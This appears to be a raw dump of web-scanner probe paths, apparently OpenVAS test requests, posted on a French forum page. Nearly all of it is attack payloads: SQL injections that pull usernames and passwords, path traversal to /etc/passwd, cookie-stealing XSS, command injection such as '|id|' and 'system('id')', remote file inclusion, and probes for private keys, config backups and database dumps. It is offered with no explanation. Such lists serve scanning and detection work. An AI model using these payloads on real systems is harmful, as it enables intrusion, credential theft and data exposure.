forum.php?forum=-1%20UNION%20SELECT%20null%2c123456%2cnull%2cnull%2cnull%2cnull%2f*
front_content.php
frontend/frontend.nocache.js
frontend/js.php?module=../../../../../../../../../../../../../../../../../../etc/passwd%00&file=frontend.js&language=en
frontend/nagvis-js/index.php
ftpsync.settings
functionRouter
gadgets/Blog/BlogModel.php?path=/etc/passwd%00
gallery.php
garoon/grn.exe
general/login.php
get_flash_info.php?ver=1'
get_status.cgi
global_settings.py
gm.cgi
gnat/admin/index.php
grn.exe
grn/grn.exe
guestbook.cgi
guestbook.cgi_1235714721
guestbook.cgi_1823016532
guestbook.php
guestbook.pl
guestbook.pl_1049307391
guestbook.pl_1437438317
guides.html
GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA
GW5/GWWEB.EXE?HELP=bad-request
GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA
GWWEB.EXE?HELP=bad-request
help.html
help.php
help/copyright.html
help/index.html
help/index.php
hints.pl?|id|
home.cfm?Mode=debug
home.cfml?Mode=debug
home.html
home.php
home/+login
home/index.php
HomePage
horde/services/help/?module=chora&show=about
hosting/discovery
hotspotlogin.cgi?res=failed&reply=1
htaccess.txt
htdocs/index.php
htdocs/login.php
html/admin.php
html/affich.php?base=http://xxx.xxxxxx./
html/index.php
html/infoen.htm
html/portal/login.jsp
HTMLEditor/_whatsnew.html
HTMLEditor/fckeditor.js
htsearch?config=vt-test&restrict=&exclude=&method=and&format=builtin-long&sort=score&words=
htsearch.cgi?words=%22%3E%3Cscript%3Efoo%3C%2Fscript%3E
i-mall.cgi?p=|id|
i.php
ibillpm.pl
ibillpm.pl_288361805
ibillpm.pl_486256335
IBSng/util/show_multistr.php
id_dsa
id_dss
id_ecdsa
id_ed25519
id_rsa
identity/login/shell/sitecoreidentityserver
ikiwiki/
inc/fckeditor/_whatsnew.html
inc/fckeditor/fckeditor.js
inc/htmlarea/plugins/FileManager/standalonemanager.php
include/fckeditor/_whatsnew.html
include/fckeditor/fckeditor.js
includer.cgi?template=vt-test
includes/esqueletos/skel_null.php
includes/fckeditor/_whatsnew.html
includes/fckeditor/fckeditor.js
includes/include.php
includes/js/mambojavascript.js
includes/tiny_mce/plugins/filemanager/classes/FileManager/FileSystems/ZipFileImpl.php
includes/tiny_mce/plugins/imagemanager/config.php
includes/window_top.php
indeks.php?db=frontpage
index
index_en.jsp
index.action
index.cfm
index.cfm?Mode=debug
index.cfml?Mode=debug
index.cgi
index.do
index.htm
index.html
index.js%70
index.jsp
index.php
index.php?_a=knowledgebase&_j=search&searchm=<script>alert(document.cookie)</script>
index.php?act=Arcade&do=stats&gameid=1'
index.php?act=publ&id=-3+UNION+SELECT+1,2,3,4,0x53514c2d496e6a656374696f6e2d54657374
index.php?action=login
index.php?action=login.index&host=0
index.php?action=Login&module=Users&login_module=Home&login_action=index
index.php?c=access&a=login
index.php?cmd=search&keywords=\"><script>alert(document.cookie);</script>
index.php?controller=login&action=showlogin
index.php?err=3&email=<script>foo</script>
index.php?error=<script>foo</script>
index.php?file=Liens&op=\"><script>window.alert('test');</script>
index.php?function=add_kom&no=<script>foo</script>
index.php?function=show_all&no=%253cscript>foo%253c/script>
index.php?gadget=Glossary&action=view&term=%3cscript%3ealert('openvasvt166634723')%3b%3c%2fscript%3e
index.php?gadget=Glossary&action=ViewTerm&term=%3cscript%3ealert('openvasvt166634723')%3b%3c%2fscript%3e
index.php?get_action=get_boot_conf
index.php?id=ke0zdxqyik'
index.php?id=vh282t3hk2'
index.php?ip=;/bin/cat%20/etc/passwd
index.php?m=recipes&a=search&search=yes&base_id=5+union+all+select+1,2,+0x53514c2d496e6a656374696f6e2d54657374,4,5,6,7+from+security_users--
index.php?mod=home&act=about
index.php?mode=administration
index.php?module=site&show=home
index.php?module=users&action=user&command=login_page
index.php?module=Users&parent=Settings&view=SystemSetup
index.php?n=guest&c=0&m=search&s=forum&wert=-1%25%22%20UNION%20ALL%20SELECT%201,2,3,4,CONCAT(nick,%200x3a,%20pwd),6%20FROM%20com_users%23
index.php?OPT_Session=VT_Req
index.php?option=com_joomradio&page=show_video&id=-1%20UNION%20SELECT%20user%28%29,concat%28username,0x3a,password%29,user%28%29,user%28%29,user%28%29,user%28%29,user%28%29%20FROM%20jos_users--
index.php?owa_do=base.loginForm
index.php?p='vt-test
index.php?page=../../../../../../../../../../../etc/passwd%00
index.php?page=/etc/passwd%00
index.php?page=http://xxxxxxxxxxxxx/vt-test
index.php?page=rss.php%00
index.php?page=start
index.php?path=<script>malicious_code</script>
index.php?s=blog&m=permalink&x=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
index.php?search=%3cscript%3ealert('openvasvt1424677842')%3b%3c%2fscript%3e&function=search
index.php?section=<script>alert(document.cookie)</script>&action=login
index.php?seite=0
index.php?setLang=vuln-test&lang[vuln-test][file]=../../../../../../../../../../../../etc/passwd
index.php?system=../../../../../../../../../etc/passwd%00
index.php?x=admin
index.php.backup
index.php.bak
index.php.bkp
index.php.copy
index.php.old
index.php.orig
index.php.save
index.php.swp
index.php.temp
index.php.tmp
index.php/admin
index.php/index/install
index.php/install/
index.php/login
index.php/Main_Page
index.php/nette.micro/?callback=shell_exec&cmd=id&what=-1
index.php/s/login
index.php/Special:Version
index.php~
index.php3
index.php4
index.pl
index.pl/homels?func=add;class=WebGUI::Asset::Wobject::Article%3bprint%20%60id%60;
index.rb
Index2.php
index2.php?_SERVER[]=&_SERVER[REMOTE_ADDR]='.system('id').exit().'&option=wrapper&module[module]=1
info.php
innoedit.cgi?download=;id|
inserter.cgi?/etc/passwd
Install
install.php
install/
install/index.php
Install/InstallWizard.aspx
install/make-config.php
install/system-compatibility
installation/default.asp
installation/index.php
installer-backup.php
installer.php
installer.pl
interface/login/login.php
interface/logon.do
intro.php
ion-p?page=../../../../../etc/passwd
irc.cgi
jaws/index.php
jobdetails.php?jobid=-5%20union%20select%2012345678987654321,2,3,4,5,6,concat(admin,0x23,email,0x5D,loginname,0x7E,pass),8,9,0,1,2,3,4,5,6,7,8,9,0%20from%20users--
journal.php?id='
jQuery-File-Upload/example/upload.php
jQuery-File-Upload/php/index.php
jQuery-File-Upload/server/php/upload.class.php
jQuery-File-Upload/server/php/UploadHandler.php
jsonrpc.php
jsp/fw/internal/Login.jsp
key.pem
kommentar.php?filecat=\"><script>alert(/xss-test/)</script>&fileid=0
language/en/text.php/<script>alert('openvasvt');</script>
left.php
lib/
lib/browsefiles.php?dir=/etc
lib/browsefolders.php?dir=/etc
lib/CHANGES
lib/composer.json
lib/README
lib/version.phps
library/lib.menu.php
libs/smarty_ajax/index.php?_=&f=update_intro&page=../../../../../../../../../../../../../../../../../../etc/passwd%00
license.php
license.txt
LightNEasy.php?do=login
Lisez%20moi.txt
listinfo
listinfo.cgi
listinfo.py
listing.php
listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|
lists/admin/?page=about
LiveTime/WebObjects/LiveTime.woa
loader-wizard.php?page=phpinfo
local.properties
localhost.sql
login
Login
login_page.php
login.action
Login.aspx
login.cgi
login.cgi?username=&command=simple&do=edit&password=&file=|id|
Login.do
login.htm
login.html
login.jsp
Login.jsp
login.php
Login.php
login.php?login=<script>foo</script>
login.php?ref='%3e%3cscript%3ealert(openvasvt307971467)%3c%2fscript%3e
login.php?url=index.php%3F
login.pl
login.rol
login.wdm
login/
login/auth
login/index.php
login/login.nocache.js
login/login.php
LoginPage.do
mail.cgi
mailwise/mw.exe
main.html
main.php
Main/WebHome
manager/index.php
manifest.json
manpage/index.php?command=/etc/passwd
medialist.php
menu.jsp
message.php?skin=\"><script>alert(/openvasvt/)</script>
metadot/index.pl?isa=Session&op=auto_login&new_user=&key='[foo]
mj_wwwusr
mlog.html?screen=/etc/passwd
moadmin.php?db=admin&action=listRows&collection=fdsa&find=array();phpinfo();
module.php?link=http://xxxx./index.php
module.php?mod=<script>alert(8154711)</script>
module.php?module=osTicket&file=/../../../../../../../../../../../etc/passwd
module.php/core/frontpage_welcome.php
module/biz/index.php
module/forum/main.php
modules.php?modload=Albums&op=photo&id=-1+UNION+SELECT+1,2,3,0x53514c2d496e6a656374696f6e2d54657374%20--
modules.php?name=gallery&files=foobar
modules/fckeditor/_whatsnew.html
modules/fckeditor/fckeditor.js
modules/module_db.php?pivot_path=http://xxxxxxxxxx/
modules/news/index.php
modules/plain/adminpart/addplain.php?module=../../../../../../../../../../../../etc/passwd%00
modules/plain/adminpart/addplain.php?module=../../../javascript/sniffer.js%00
modules/profile/user.php?aXconf[default_language]=../../../../../../../../../../../../../../../../../../etc/passwd%00
modules/Submit/index.php?op=pre&title=<script>window.alert(document.cookie);</script>
mrtg.cgi?cfg=/../../../../../../../../../etc/passwd
ip.dyn.ma.key
ip.dyn.ma.pem
ip.dyn.ma.sql
ip.dyn.key
ip.dyn.pem
ip.dyn.sql
ip.key
ip.pem
ip.sql
mt.cgi
mw.exe
myevent.php
mylog.html?screen=/etc/passwd
myserver.key
mysql.sql
mysqldump.sql
nameko.php
napro4/index.php
nbmember.cgi?cmd=test
net.key
net.pem
net.sfr.key
net.sfr.pem
net.sfr.rev.111.112.113.114.key
net.sfr.rev.111.112.113.114.pem
net.sfr.rev.111.112.113.114.sql
net.sfr.rev.111.112.113.key
net.sfr.rev.111.112.113.pem
net.sfr.rev.111.112.113.sql
net.sfr.rev.111.112.key
net.sfr.rev.111.112.pem
net.sfr.rev.111.112.sql
net.sfr.rev.111.key
net.sfr.rev.111.pem
net.sfr.rev.111.sql
net.sfr.rev.key
net.sfr.rev.pem
net.sfr.rev.sql
net.sfr.sql
net.sql
nette.micro/?callback=shell_exec&cmd=id&what=-1
newcomment/?ArticleId=\"><script>foo</script>
newfile.txt
news.php
news.php?news_id=4+union+all+select+0,1,2,0x53514c2d496e6a656374696f6e2d54657374
news.php4?nid=-12'+union+select+1,2,0x53514c2d496e6a656374696f6e2d54657374,4,5,6,7,8,9,10,11/*
news/?group_id=&limit=50&offset=50;select+1+as+id,unix_pw+as+forum_id,+user_name||unix_pw+as+summary+from+users
news/admin/index.php
news/index.php
nmiscgi.pl
non-existent-1470621906
non-existent-916193560
nonexistent.php
nph-mr.cgi?do=loginhelp&configLanguage=english
nph-publish.cgi
nph-publish.cgi_2071965282
nph-publish.cgi_709677974
nqt.php?target=127.0.0.1&queryType=all&portNum=foobar%3Cscript%3Efoo%3C/script%3E
nuxeo/
obm.php
oc-admin/index.php
ods-cgi/odscgi?HTMLFile=../../../../../../../../../../../../../../../etc/passwd
office/ag.cgi
office/ag.exe
oldnews_reader.php
open.php
openwebmail.pl
operations_gui/
order.php?dhaction=check&submit_domain=Register&domain=<script>alert(document.cookie);</script>&ext1=on
owls/glossaries/index.php?file=/etc/passwd
ox.html
page.php
page.php?xPage=<script>alert(document.cookie)</script>
passwiki.php
passwiki.php?site_id=../../../../../../../../../../../../../etc/passwd%00
pem/login/pages/login.jsf
PGPMail.pl
PGPMail.pl_1585048528
PGPMail.pl_429590238
phinx.json
phinx.yaml
phinx.yml
photo.php?id=-9999/**/union/**/select/**/1,2,0x53514c2d496e6a656374696f6e2d54657374--
photo/templates/admin_default/confirm.tpl.php
php_info.php
php-ping.php?count=1+%26+cat%20/etc/passwd+%26&submit=Ping%21
php/index.php
php/login.php
php/mytutos.php
phpinfo.php
phpliteadmin.php
phpThumb.demo.demo.php
phptonuke.php
pivot/index.php
pki/pub/pki?cmd=serverInfo
pls/portal/PORTAL_DEMO.ORG_CHART.SHOW
plugins/fckeditor/_whatsnew.html
plugins/fckeditor/fckeditor.js
plugins/system/shadowbox/min/index.php?g=sb&ad=base&lan=en&play=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd%00
pmwiki.php
Poll_It_SSI_v2.0.cgi?data_dir=/etc/passwd%00
portal/login.php?message=XSS%20Catched%20!%22))%3C/script%3E%3Cscript%3Ealert(/openvasvt/)%3C/script%3E
portfolio_genre.php?id=-67%20union%20select%201,2,0x53514c2d496e6a656374696f6e2d54657374--
Presenter/index.fsp?signout=true
print.php
print.php?page=../../../../../../../../../etc/passwd
printenv
printenv_1797429995
printenv_44459051
printfaq.php?lng=en&pg=1
privatekey.key
prodpage.cfm?CFID=&CFTOKEN=&CategoryID='openvasvt
product.comparision.php?cat=null%20union%20all%20select%201,concat_ws(0x3a,0x4f,0x70,0x65,0x6e,0x56,0x41,0x53),3,4,5%20from%20daype_users_tb%20--&name=GSM
productionnu2/fileuploader.php
productionnu2/report.php
products.php
profil.php?id=1%20<script>foo</script>
profile/index.php
pub/pki?cmd=serverInfo
public.pl
public/code/cp_dpage.php
public/code/index.php
public/telescope
public/view.php?storyid=-1%27%20UNION%20ALL%20SELECT%201,2,132323231,4,5,6,7,8,9,10%23
puttest1.html
puttest1012114801.html
puttest1589205768.html
pwn.php
query?group=/*
quixplorer_2_3/index.php?action=download&dir=&item=../../../../../../../../../etc/passwd&order=name&srt=yes
r.cgi?FILE=../../../../../../../../../../etc/passwd
r.pl?FILE=../../../../../../../../../../etc/passwd
rails/info/properties/
rails/info/routes/
RCS/
read_body.php?mailbox=<script>alert(document.cookie)</script>&passed_id=<script>alert(document.cookie)</script>&startMessage=1&show_more=0
README
readme.html
README.md
README.php
Readme.txt
README.txt
readme.txt
recentservers.xml
recovery/install/
register.php
RELEASE_NOTES.txt
ReleaseNotes.txt
research_display.php?ID=-null+UNiON+ALL+SELECT+null,null,null,0x53514c2d496e6a656374696f6e2d54657374,null,null,null
resources/ckeditor/CHANGES.md
resources/ckeditor/ckeditor.js
resources/fckeditor/_whatsnew.html
resources/fckeditor/fckeditor.js
ress.php?page=../../../../../../../../../etc/passwd%00
results.php?searchtype=\">%3cscript%3ealert('openvasvt121843797')%3b%3c%2fscript%3ecategory&searchterm=OpenVASVT
rev.key
rev.pem
rev.sql
robo3t.json
robo3T.json
robomongo.json
roschedule.php
rtm.log
ru/
s_form.cgi
s_form.cgi_1081986180
s_form.cgi_1789243609
s_form.cgi_693855254
s_form.cgi_851398245
scr/soustab.php
script/cat_for_gen.php?ad=1&ad_direct=../&m_for_racine=%3C/option%3E%3C/SELECT%3E%3C?phpinfo();?%3E
scripts.php
sdbsearch.cgi?stichwort=anything
search
search_151970048
search_2107940944
search.cgi
search.html
search.php
search.php?allwords=<br><script>foo</script>&cid=0&title=1&desc=1
search.php?dosearch=true&query=\"><script>alert(document.cookie)</script>
search.php?query=1<script>alert(document.cookie);</script>&mode=all
search.php?query=we+%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&topic=0&limit=30
search.php?searchfor=\"><script>window.alert(document.cookie);</script>
search/show.pl?url=file:/etc/passwd
search=%3Cscript%3Ealert('XSS')%3C/script%3E
searchblox/search.html
sendcard.php?view=1&id=%27openvasvt
sensorview.php
server.key
server/php/upload.class.php
server/php/UploadHandler.php
service.cnf
service/index_pri.php
services/help/?module=horde&show=about
services/help/?module=horde&show=menu
services/non-existent
services/Version?method=getVersion
services/Version/getVersion
servlet/one2planet.infolet.InfoServlet?page=<script>foo</script>
session/login.php
setseed-hub/
settings.php
settings.php.backup
settings.php.bak
settings.php.bkp
settings.php.copy
settings.php.old
settings.php.orig
settings.php.save
settings.php.swp
settings.php.temp
settings.php.tmp
settings.php~
settings.py
setup.php
setup.php3?next=1
setup/index.php
setup/install.php
setup/setup.php
sfr.key
sfr.pem
sfr.sql
sftp-config.json
shell/sitecore.version.xml
shop.cgi
shop.pl/page=;cat%20shop.pl|
shopper.cgi?newpage=../../../../../../etc/passwd
shopplus.cgi
shopplus.cgi_1368008666
shopplus.cgi_979877740
shoutbox.php
show_profile.php
showcase.action
showcat.php?cat=1'
showcategory.php?cid=-101+union+select+12345678987654321,12345678987654321,3,4,5--
showcategory.php?cid=9type=1&keyword=Pouya&radio=%3E%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E
showHome.do
showproduct.php?product=1'
showtheme.php?id=-1%27%20UNION%20ALL%20SELECT%201,2,CONCAT(name,%200x3a,%20passwd_hash),NULL,5,6,7%20FROM%20users%23
signin
signin.php
signing_system-admin/index.php
site.php
site.sql
site/index.php/admin/login/
site/login.php
sitemanager.xml
sitemap.php?id_site=<script>alert(/openvasvt/)</script>
sitemap.xml
sites/all/modules/ckeditor/CHANGES.md
sites/all/modules/ckeditor/ckeditor.js
sites/all/modules/fckeditor/_whatsnew.html
sites/all/modules/fckeditor/fckeditor.js
sites/all/modules/fckeditor/fckeditor/_whatsnew.html
sites/all/modules/fckeditor/fckeditor/fckeditor.js
sites/default/files/.ht.sqlite
sites/default/private/files/backup_migrate/scheduled/test.txt
skins/default.php?dir_inc=../etc/passwd%00
skins/default.php?dir_inc=/etc/passwd%00
smarty.php
snpfiltered.pl?t=c&u=<script>foo</script>
software-description.php?id=-5%20union%20all%20select%201,2,1234567890987654321,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
source/index.php
spip.php
spywall/login.php
sql.sql
src/apps/pom.xml
src/index.php
src/login.php
src/main.php
src/pom.xml
src/src/site/xdoc/index.xml
src/Symfony/Component/Console/CHANGELOG.md
sscd_suncourier.pl
sscd_suncourier.pl_320575721
sscd_suncourier.pl_666321881
ssl_check.php
star57.cgi?download=;id|
start
start/index.php
startPage
static/index.html
status.php
status.php3
story.pl?next=../../../../../etc/passwd%00
struts-cookbook/example/HelloWorld.action
struts-cookbook/index.action
struts-cookbook/showcase.action
struts-cookbook/Welcome.do
struts-examples/example/HelloWorld.action
struts-examples/index.action
struts-examples/showcase.action
struts-examples/Welcome.do
struts2-basic/example/HelloWorld.action
struts2-basic/index.action
struts2-basic/showcase.action
struts2-basic/Welcome.do
struts2-blank/example/HelloWorld.action
struts2-core-apidocs/help-doc.html
struts2-core-apidocs/index-all.html
struts2-core-apidocs/overview-summary.html
struts2-mailreader/Welcome.do
struts2-portlet/example/HelloWorld.action
struts2-portlet/index.action
struts2-portlet/showcase.action
struts2-portlet/Welcome.do
struts2-rest-showcase/example/HelloWorld.action
struts2-rest-showcase/index.action
struts2-rest-showcase/showcase.action
struts2-rest-showcase/Welcome.do
struts2-showcase/showcase.action
stuworkdisplay.php?ID=-1)%20UNION%20ALL%20SELECT%200x53514c2d496e6a656374696f6e2d54657374,2,3,4,5,6,7,8,9,10,11%23
style-underground/search
styles.php?toroot=/etc/passwd%00
symfony/web/index.php/auth/login
symphony/
system/admin/modules.php
system/rss.php?id=-1%20union%20select%201,22222222222,3,4,5,6,7,8,0x53514c2d496e6a656374696f6e2d54657374;
SystemInfo
tao/install/
team.rc5-72.php
telescope
telescope/requests
temp.sql
Templates/default/index_logged.php?main_loaded=1&cur_module=/etc/passwd
templates/system/css/editor.css
test.php
test.php?mode=phpinfo
themes/admin/default/modules/show.php
themes/default/header.inc.php?theme_dir=%22%3E%3Cscript%3Ealert%28/openvasvt/%29;%3C/script%3E
themes/program/themesettings.inc.php?themesdir=/etc/passwd%00
thread.php
tiki-index.php
tiki-install.php
title.html
titleBar.php
tmpl/news_main.htm
tombstone.cfm?ProfileID=<script>foo</script>
tools.php?file_id=reset_password
topic.php?filename=1%22%3e%3cscript%3ealert(%22%20%2b%20vtstrings%5b%22lowercase_rand%22%5d%20%2b%20%22)%3c%2fscript%3e
translate.sql
triton/login/pages/loginPage.jsf
typo3_src/ChangeLog
typo3/index.php
typo3/sysext/opendocs/composer.json
typo3/sysext/recordlist/composer.json
typo3/sysext/sys_note/composer.json
typo3/sysext/t3editor/composer.json
update.php
upload.php
upload/account-login.php
upload/index.php
upstnt.php?zid=1&lid=1&cartid='
urheber.php?name=../../../../../../../../../../etc/passwd%00
user.cgi?cmd=show&page=/../../../etc/passwd
user.php
user/index.php
user/login
userlogin!default.action
userlogin!doDefault.action
users.sql
users/login.php
usr/extensions/get_tree.inc.php?GLOBALS[root_path]=/etc/passwd%00
utils.js
v1/settings/first-login
v3/settings/first-login
vendor/plugins/fckeditor/public/javascripts/_whatsnew.html
vendor/plugins/fckeditor/public/javascripts/fckeditor.js
viart_shop.xml
view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00
view_user.php?list=1&letter=&sort_by='select
view.php?article_id=-1%20UNION%20ALL%20SELECT%201,2,3,0x53514c2d496e6a656374696f6e2d54657374,5,6,7,8,9
view.php?id=-1+union+select+0x53514c2d496e6a656374696f6e2d54657374,2,3,4,5,6,7,8,9,10+from+test_category&mytable=test_category
view/TWiki/WebHome
viewcvs.cgi/?cvsroot=<script>foo</script>
viewer
viewfaqs.php
viewpic.php?id=7&conversation_id=<script>foo</script>&btopage=0
views/login
viewstory.php
viewvc.cgi/
viewvc/
viralator.cgi
viralator.cgi_1247142494
viralator.cgi_1828062527
vpasswd.cgi
vpasswd.cgi_1051800675
vpasswd.cgi_461946153
WackoWiki
wcf/acp/dereferrer.php?url=javascript:alert(document.cookie);
web_reports/cgi-bin/InfoStation.cgi?mod=login&func=login&lang_code=en
Web_Store/web_store.cgi?page=../../../../../../etc/passwd%00.html
WEB-INF../web.xml
web-inf../web.xml
WEB-INf./web.xml
WEB-INF./web.xml
web-inf./web.xml
WEB-INF/local.properties
WEB-INF/web.xml
web-inf/web.xml
WEB-INF/webapp.properties
web.config
web.xml
Web/?
web/?wicket:bookmarkablePage=:org.geoserver.web.AboutGeoServerPage
web/app_dev.php/_configurator/step/0
web/guest
web/help.php
web/login
web/magmi.php
webacc?User.interface=/../webacc/wml
webadmin.php?show=%2Fetc%2Fpasswd
webapp.properties
webapp/home.html?0
webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;id|&CODE=PHOLD
webFileBrowser.php
weblibs.pl
webplus?about
webspirs.cgi?sp.nextform=../../../../../../../../../etc/passwd
Welcome.do
welcome.do
welcome/index.html
wiki.cgi
wiki.php
wiki.php/<script>foo</script>
wiki/index.php
WikiHome
WinSCP.ini
winscp.ini
wizard/index.php?type=';phpinfo();//
wizard/url.php?${phpinfo()}=1
wonderdesk.cgi
wp-admin/install.php
wp-admin/setup-config.php
wp-config.php.backup
wp-config.php.bak
wp-config.php.bkp
wp-config.php.copy
wp-config.php.old
wp-config.php.orig
wp-config.php.save
wp-config.php.swp
wp-config.php.temp
wp-config.php.tmp
wp-config.php~
wp-content/plugins/ckeditor-for-wordpress/ckeditor/CHANGES.md
wp-content/plugins/ckeditor-for-wordpress/ckeditor/ckeditor.js
wp-content/plugins/fckeditor-for-wordpress/fckeditor/_whatsnew.html
wp-content/plugins/fckeditor-for-wordpress/fckeditor/fckeditor.js
wp-links-opml.php
wp-login.php
wrx.cgi
ws_ftp.ini
WS_FTP.INI
WS_FTP.ini
wu-moadmin.php?db=admin&action=listRows&collection=fdsa&find=array();phpinfo();
WW/cwiki.apache.org/WW/guides.html
WW/cwiki.apache.org/WW/home.html
www/admin/index.php
wwwboard.html
x_news.php
xymon.html
YaBB.pl
zboard.php?id=gallery&sn1=ALBANIAN%20RULEZ='%3E%3Cscript%3Efoo%3C/script%3E
zml.cgi?file=../../../../../../../../../../../../etc/passwd%00
zp-core/admin.php?a="><script>alert(/xss-test/)</script>
Répondre
Vous n'êtes pas autorisé à écrire dans cette catégorie